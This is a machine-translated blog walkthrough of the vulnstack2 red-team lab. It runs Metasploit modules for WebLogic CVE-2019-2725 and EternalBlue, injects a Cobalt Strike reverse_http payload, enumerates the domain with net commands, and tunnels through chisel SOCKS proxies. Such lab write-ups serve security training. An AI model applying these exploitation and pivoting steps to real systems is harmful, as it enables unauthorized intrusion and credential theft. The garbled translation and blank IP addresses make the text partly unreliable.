vulnstack2 of red sun safety ATT & CK target aircraft combat series

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study hard and make progress every day

Environment configuration

Baidu members can download directly from the cloud without any address

While downloading, you can start the network configuration of vmware

The following figure is given by the official. From the perspective of virtual machine network, it seems to be similar to vulnstack1. DMZ area is the boundary is the external network and is the internal network

attacker Internet: kali+windows Attack machine (I set it myself) NAT Network segment 192.168.239.*,Analog Internet)
DMZ: External boundary server, Win2008(64 Bit)
Office area: domain members also have to surf the Internet, win7(32 Bit)
Core area: domain control, 2012 (64 bit)

Therefore, there are two network segments in the middle, an external network segment and an internal network segment

Since we need two network segments, we need to make some configuration on vmware

First, use one VMnet2 ( for host only and the other VMnet8 ( for NAT. This will not be adjusted and can be Baidu

After adjusting vmware, the three servers are all ready, decompress them respectively, and then directly open the vmx file, mainly the network configuration is equivalent to the gateway server (external border server), so naturally you need two network cards in the right order, with the web de1ay. Com's network configuration is the same

After the network configuration is completed, you can log in to each server to see if you have successfully obtained the IP and password 1qaz@WSX

According to the principle, there is no need to modify the configuration, but the author writes all the IP addresses. We don't care about the internal network segment 10, because it is a new network card VMnet2, which is also adjusted to 10. It is mainly the external network segment. Everyone is different. The author writes all the external network segments as, so we can either modify our nat to segment 111, Or go to every server, which is actually the WEB and PC. change the IP of the first network card from 111 to its own NAT network segment. I'm 239. Here's an example of a WEB server

Note that only the server of the WEB will display an error in the password. Just turn the snapshot to 1.3, and then enter administrator to modify the network/ 1qaz@WSX

I only changed paragraph C to 239, which was I changed it to

The following is the IP table



WEB: External boundary server

PC: Domain member

DC: Domain control

Then enter the WEB and go to C:\Oracle\Middleware\user_projects\domains\base_domain\bin path

Use administrator to enter administrator/1qaz@WSX

be careful!!! Right click respectively and execute setDomainENV, startManageWeblogic and startWeblogic with administrator privileges

After successful startup, cmd will always be maintained. Anyone who has used java web services or weblogic can understand it

This concludes the environment configuration


Web penetration

information gathering

kali scan survival

arp-scan -l
nmap -sP --min-hostgroup 1024 --min-parallelism 1024

Scan details

nmap -T4 -A -p 1-65535 -oN nmap.A

7001 is prominently in front of us. It's still the old version 10.3.6*

Visit 7001


Using weblogic's scanning tool

git clone


pip3 install -r requirements.txt
python3 7001

There are many loopholes

There are many ways to start using it online. I choose the one that is more troublesome here

Enter msf to check the exploit script

search CVE-2019-2725

At the end of April, it released exploit/multi/misc/weblogic_deserialize_asyncresponseservice

The default target of this module is unix, so it should also be set to windows

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set target 1
set LPORT 6666

Permission maintenance / promotion

Raise the right

It is derived from CS and launched in CS, which is similar to my previous vulnstack1, so I won't talk about it in detail

Start CS

nohup ./teamserver 123456 >/dev/null &
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost
set lport 7777
set session 1

This interface of CS has a special feeling every time you look at it. By the way, right

Intranet Penetration

information gathering

Took the system of the first server and collected a wave of information

ipconfig /all   # View local ip address and domain
route print     # Print routing information
net view        # View other host names in the LAN
arp -a          # View arp cache
net start       # Check which services are enabled
net share       # View which sharing is enabled
net share ipc$  # Turn on ipc sharing
net share c$    # Enable c disk sharing
net use \\192.168.xx.xx\ipc$ "" /user:""    # And 192.168 xx. XX establish an empty connection
net use \\192.168.xx.xx\c$ "password" /user:"user name"    # Establish c disk sharing
dir \\192.168.xx.xx\c$\user    # View 192.168 xx. Files in user directory of XX C disk

net config Workstation    # Check the computer name, full name, user name, system version, workstation, domain and login domain
net user                 # View the list of local users
net user /domain         # View domain users
net localgroup administrators    # View local Administrators group (usually domain users)
net view /domain         # View how many fields are there
net user user name /domain   # Get the information of users in the specified domain
net group /domain        # View the working groups in the domain and how many groups the users are divided into (can only operate on the domain controller)
net group Group name /domain    # View a workgroup in a domain
net time /domain           // The primary domain server will also act as a time server
net group "domain admins" /domain  # View the name of the domain administrator
net group "domain computers" /domain  # View other host names in the domain
net group "doamin controllers" /domain  # View domain controllers (there may be multiple)
net group "Enterprise Admins" /domain    // View domain Administrators group

After some collection

The operating system of the target Web server host is Windows Server 2008, with two network cards connecting and network segments respectively

The network where the target host is located has a domain environment, and the domain name is de1ay COM, there are two domain hosts WEB and PC, and the domain controller is DC, the host name is DC, and the domain Administrator is Administrator.

ping the DC and PC respectively, and we can see that these two are our goals below

PC yet)

Transverse penetration

kali added an agent to collect information about a wave of intranet

Use chisel, windows use windows amd64, linux use linux amd64, because they are all 64 bit

Upload meterpreter to windows agent tool

upload /app/tools/chisel.exe C:\\Oracle\\Middleware\\user_projects\\domains\\base_domain\\bin\\chisel.exe

windows Background running agent

start /b chisel.exe server -p 1090 --socks5

kali configure agent tool

vim /etc/proxychains4.conf
socks5 1080

Execute agent tool

nohup ./chisel client socks &

nmap scan

proxychains nmap -Pn -sT > nmap_res.txt

The same information we collected

Next, the target is these two and

msf plus agent sweep eternal blue, it's been a long time

setg Proxies socks5:
use auxiliary/scanner/smb/smb_ms17_010
set threads 5

Both 10 and 201. Try 201 first

setg Proxies socks5:       // Preset agent
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost
set lport 6777
set AutoRunScript post/windows/manage/migrate             // Automatic migration process

The number is wrong. Forget it

Use CS to list all the passwords

Use the same method in vulnstack1 to bring other servers in the domain online

It's really an intranet killer

Keywords: penetration test Web Security

Added by ramram on Fri, 04 Mar 2022 17:49:56 +0200